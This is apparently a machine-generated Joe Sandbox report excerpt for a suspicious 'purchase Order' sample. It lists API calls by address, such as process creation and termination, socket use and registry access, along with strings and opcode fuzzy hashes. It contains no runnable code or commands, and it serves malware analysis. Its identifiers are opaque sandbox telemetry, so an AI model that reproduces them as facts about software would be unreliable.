                                                        • Opcode Fuzzy Hash: 1936925835c5f24075bab2e7944c0e817621f92e5808dba85eb0e40033a4b6ce
                                                        • Instruction Fuzzy Hash: D7F11775A00209AFCF04DF94D988EAEB7B9FF89315F108499F915AB250DB31AE41DB90
                                                        APIs
                                                        • _memset.LIBCMT ref: 00CA24F5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CA2688
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CA26AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CA26EC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CA270E
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CA286F
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CA28A1
                                                        • CloseHandle.KERNEL32(?), ref: 00CA28D0
                                                        • CloseHandle.KERNEL32(?), ref: 00CA2947
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: f5e02a3ea05308f71f1d0a10eedb70c5d063b54c0672b263adf74e82d1344118
                                                        • Instruction ID: 586615ad67ff1f178577428f541041b91aeb6669605601a0a00bbb9c79d50112
                                                        • Opcode Fuzzy Hash: f5e02a3ea05308f71f1d0a10eedb70c5d063b54c0672b263adf74e82d1344118
                                                        • Instruction Fuzzy Hash: ADD1CF35604211DFC714EF28C491A6EBBE1FF86314F14846DF89A9B2A2DB30DD45DB52
                                                        APIs
                                                          • Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8
                                                          • Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C85FA6,?), ref: 00C86EF1
                                                          • Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C875CA
                                                        • _wcscmp.LIBCMT ref: 00C875E2
                                                        • MoveFileW.KERNEL32(?,?), ref: 00C875FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 0d1a7454d368dbe4b1230b593ee1dd86cd936fa735fa60c0752a547b65cc8a52
                                                        • Instruction ID: 7bcc7b36b42570daa86c296ae46d544bd5d9ff99162935b1e49505451b7af07a
                                                        • Opcode Fuzzy Hash: 0d1a7454d368dbe4b1230b593ee1dd86cd936fa735fa60c0752a547b65cc8a52
                                                        • Instruction Fuzzy Hash: 8A5132B2A092299ADF61FB94D881DDE73BCAF08314F1041AAFA05E3141EA74D7C5CF64
                                                        APIs
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00C5EAEB
                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00C5EB32
                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00CBDC86
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CBDAD1,00000004,00000000,00000000), ref: 00CBDCF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 5cd289d3e7b473c4d4b13be29a1e8e89cd6f712bfdf73350894b6886033ad6ff
                                                        • Instruction ID: 4b1a4741fe7313a833df5d7c736722be9ea8a2eaa9709b6242884c0c1d6cc089
                                                        • Opcode Fuzzy Hash: 5cd289d3e7b473c4d4b13be29a1e8e89cd6f712bfdf73350894b6886033ad6ff
                                                        • Instruction Fuzzy Hash: 61410378608280DBC73D4B29CD8DB6A7F96AB41307F19081DF8A782561D671BBC8D32C
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B26C
                                                        • HeapAlloc.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B273
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C7AEF1,00000B00,?,?), ref: 00C7B288
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B290
                                                        • DuplicateHandle.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B293
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C7AEF1,00000B00,?,?), ref: 00C7B2A3
                                                        • GetCurrentProcess.KERNEL32(00C7AEF1,00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B2AB
                                                        • DuplicateHandle.KERNEL32(00000000,?,00C7AEF1,00000B00,?,?), ref: 00C7B2AE
                                                        • CreateThread.KERNEL32(00000000,00000000,00C7B2D4,00000000,00000000,00000000), ref: 00C7B2C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 08ddb8711467718b7900cc1151d541c8b1001615f7232276239e8afb5a8038cf
                                                        • Instruction ID: b42aa902c406e97baa44cf8733c8f0121f035e233fc9e31370eca6bd4317b9f8
                                                        • Opcode Fuzzy Hash: 08ddb8711467718b7900cc1151d541c8b1001615f7232276239e8afb5a8038cf
                                                        • Instruction Fuzzy Hash: BF01B6B5240348BFE710ABA5DC4AF6F7BACEB88711F058425FA06DB1A1CA74D801CB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: c50ae97d05d542c9f7830c8b00a435eec10e3b4e786422218a72d3aa58c96f65
                                                        • Instruction ID: 0848378f4b7349de71f89108de65bf6583ed497f1b52a8fcee59d8d88dd61911
                                                        • Opcode Fuzzy Hash: c50ae97d05d542c9f7830c8b00a435eec10e3b4e786422218a72d3aa58c96f65
                                                        • Instruction Fuzzy Hash: B5E1C071A0021AAFDF14DFA8C8C9BAE77B5EF48354F148029F915AB281D770EE41DB94
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: 37e991b0211bf438d5953cadd29ebd5bd1f873437b6bda360eb7cfad7ed083b9
                                                        • Instruction ID: f1e515487d5760d9aa88123724bfac6cbcc5d4e937698e1b4700193ed97d3898
                                                        • Opcode Fuzzy Hash: 37e991b0211bf438d5953cadd29ebd5bd1f873437b6bda360eb7cfad7ed083b9
                                                        • Instruction Fuzzy Hash: 5591AF71A00219BBDF24CFA5D948FAEBBB8EF45710F108169F515AB284DB709E44CFA0
                                                        APIs
                                                          • Part of subcall function 00C86532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C86554
                                                          • Part of subcall function 00C86532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C86564
                                                          • Part of subcall function 00C86532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C865F9
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA179A
                                                        • GetLastError.KERNEL32 ref: 00CA17AD
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA17D9
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CA1855
                                                        • GetLastError.KERNEL32(00000000), ref: 00CA1860
                                                        • CloseHandle.KERNEL32(00000000), ref: 00CA1895
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: ac153f26c21e6848b65d602d693df3d61c4459cb4c4ee1610cbb9360ed272585
                                                        • Instruction ID: 9800b536924d3ce786a93eb3d2906b1cf0a05fbf302cca31eca7c984c65539c4
                                                        • Opcode Fuzzy Hash: ac153f26c21e6848b65d602d693df3d61c4459cb4c4ee1610cbb9360ed272585
                                                        • Instruction Fuzzy Hash: 8B41F171600201AFDB05EF94CCD5F6EB7A1AF45314F098068F9069F2D2DB78AA44DB95
                                                        APIs
                                                        • ShowWindow.USER32(00D01628,00000000,00D01628,00000000,00000000,00D01628,?,00CBDC5D,00000000,?,00000000,00000000,00000000,?,00CBDAD1,00000004), ref: 00CAE40B
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00CAE42F
                                                        • ShowWindow.USER32(00D01628,00000000), ref: 00CAE48F
                                                        • ShowWindow.USER32(00000000,00000004), ref: 00CAE4A1
                                                        • EnableWindow.USER32(00000000,00000001), ref: 00CAE4C5
                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CAE4E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 642888154-2594219639
                                                        • Opcode ID: 89fb3a228636bce914bc23e32200c8d2570bdd556784578efdfa7ac153ef0428
                                                        • Instruction ID: 1c0e8aa883314d4f1bf33211a833c64db00e99740e075277e6bca6060742dedb
                                                        • Opcode Fuzzy Hash: 89fb3a228636bce914bc23e32200c8d2570bdd556784578efdfa7ac153ef0428
                                                        • Instruction Fuzzy Hash: DF416335601142EFDB21CF64C499F947BE5BF4A308F1845B9FA698F1A2C731E942CB91
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00C858B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 45b48305fc0a06b73d2e623da8a9d7be4cdee0493d67ae29a557af8510ce1081
                                                        • Instruction ID: 330bc39b86838bea539bbb688735c94351fa6bd6363cbcfd16ec8a4fa61d5139
                                                        • Opcode Fuzzy Hash: 45b48305fc0a06b73d2e623da8a9d7be4cdee0493d67ae29a557af8510ce1081
                                                        • Instruction Fuzzy Hash: 0111E736649746FAE7156B959C82DAB339CAF15328B30003BF611F62C1E7F0AA00576E
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00C8A806
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 280ee0243d7e5c04c6175b83a35a76c6eacd0e52b75554aa2ec389a23a20acc4
                                                        • Instruction ID: aeeef5466508be8aa529887e4551e332578d2fa8d61c4d8c37f51cba5ebb1937
                                                        • Opcode Fuzzy Hash: 280ee0243d7e5c04c6175b83a35a76c6eacd0e52b75554aa2ec389a23a20acc4
                                                        • Instruction Fuzzy Hash: C5C17D75904219DFEB04EF94C481BEEB7F4EF08319F24406AE616E7241D734AA82DF99
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C86B63
                                                        • LoadStringW.USER32(00000000), ref: 00C86B6A
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C86B80
                                                        • LoadStringW.USER32(00000000), ref: 00C86B87
                                                        • _wprintf.LIBCMT ref: 00C86BAD
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C86BCB
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C86BA8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 15b0ae6d2b11e41ca769ec0de6a37c213d7697193866ee850004b30c0751d576
                                                        • Instruction ID: 8b5c52ed138be4e216399a26b6c2cb165b6d131625c286234e258e5a2cfbdad8
                                                        • Opcode Fuzzy Hash: 15b0ae6d2b11e41ca769ec0de6a37c213d7697193866ee850004b30c0751d576
                                                        • Instruction Fuzzy Hash: E9011DF6900208BFEB11ABA4DD89FFA776CDB08309F0444A1F746E6041EA749E858B75
                                                        APIs
                                                          • Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA2BF6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper
                                                        • String ID:
                                                        • API String ID: 2595220575-0
                                                        • Opcode ID: 564a5dcb85ab7ccdccab5cf4bb5de8ec89e9b7e75964dfa286b7d65214a9bb4d
                                                        • Instruction ID: 0cb6c7864e48462d627e4b69b7a1c5629990c4341d6278f7baf6ef0b10edd7fc
                                                        • Opcode Fuzzy Hash: 564a5dcb85ab7ccdccab5cf4bb5de8ec89e9b7e75964dfa286b7d65214a9bb4d
                                                        • Instruction Fuzzy Hash: 2191AB716042029FDB00EF58C891F6EB7E5FF89318F04881DF996972A2DB34E945DB46
                                                        APIs
                                                        • select.WSOCK32 ref: 00C99691
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C9969E
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00C996C8
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C996E9
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C996F8
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00C997AA
                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00CDDC00), ref: 00C99765
                                                          • Part of subcall function 00C7D2FF: _strlen.LIBCMT ref: 00C7D309
                                                        • _strlen.LIBCMT ref: 00C99800
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                        • String ID:
                                                        • API String ID: 3480843537-0
                                                        • Opcode ID: c0dbc1e3b59e0f6aeeb73039cfd39228dc8b89c0114de7440f823c54c871b6ac
                                                        • Instruction ID: 3927e76e1fe46a8b73d442a79c1b7f7a71e31e5504a3043d17cb08310291c542
                                                        • Opcode Fuzzy Hash: c0dbc1e3b59e0f6aeeb73039cfd39228dc8b89c0114de7440f823c54c871b6ac
                                                        • Instruction Fuzzy Hash: 2581DF71504200ABC710EF68CC89F6BB7E8EF85714F144A1DF9569B2A1EB30DE04DB96
                                                        APIs
                                                        • __mtinitlocknum.LIBCMT ref: 00C6A991
                                                          • Part of subcall function 00C67D7C: __FF_MSGBANNER.LIBCMT ref: 00C67D91
                                                          • Part of subcall function 00C67D7C: __NMSG_WRITE.LIBCMT ref: 00C67D98
                                                          • Part of subcall function 00C67D7C: __malloc_crt.LIBCMT ref: 00C67DB8
                                                        • __lock.LIBCMT ref: 00C6A9A4
                                                        • __lock.LIBCMT ref: 00C6A9F0
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00CF6DE0,00000018,00C75E7B,?,00000000,00000109), ref: 00C6AA0C
                                                        • EnterCriticalSection.KERNEL32(8000000C,00CF6DE0,00000018,00C75E7B,?,00000000,00000109), ref: 00C6AA29
                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00C6AA39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1422805418-0
                                                        • Opcode ID: a573761f40defc34e2b4c66bbba76b0fb937e478cba313aef9c2052c00f9db9e
                                                        • Instruction ID: 729e63b619e96a8bee45c5f74d2c4937cb6587c52b72f5dd6859c164a4bc1f14
                                                        • Opcode Fuzzy Hash: a573761f40defc34e2b4c66bbba76b0fb937e478cba313aef9c2052c00f9db9e
                                                        • Instruction Fuzzy Hash: 584127719003059BEB309FA8DAC475CBBB0AF05325F24832AE529FB2D2D7749941DF96
                                                        APIs
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                          • Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717
                                                        • _wcstok.LIBCMT ref: 00C9184E
                                                        • _wcscpy.LIBCMT ref: 00C918DD
                                                        • _memset.LIBCMT ref: 00C91910
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 5cd9c41321bd6690310f34e4ea1be2358fa4624708de9b5ff36d10e1daf4cfe9
                                                        • Instruction ID: 4fce516b5174e9729abd0618364a54cc77f8bfa944de4595dfb49cdb034bfd2c
                                                        • Opcode Fuzzy Hash: 5cd9c41321bd6690310f34e4ea1be2358fa4624708de9b5ff36d10e1daf4cfe9
                                                        • Instruction Fuzzy Hash: 7BC181715043419FC764EF24C886AAEB7E4FF85350F04492DF99A972A2DB30ED45DB82
                                                        Memory Dump Source
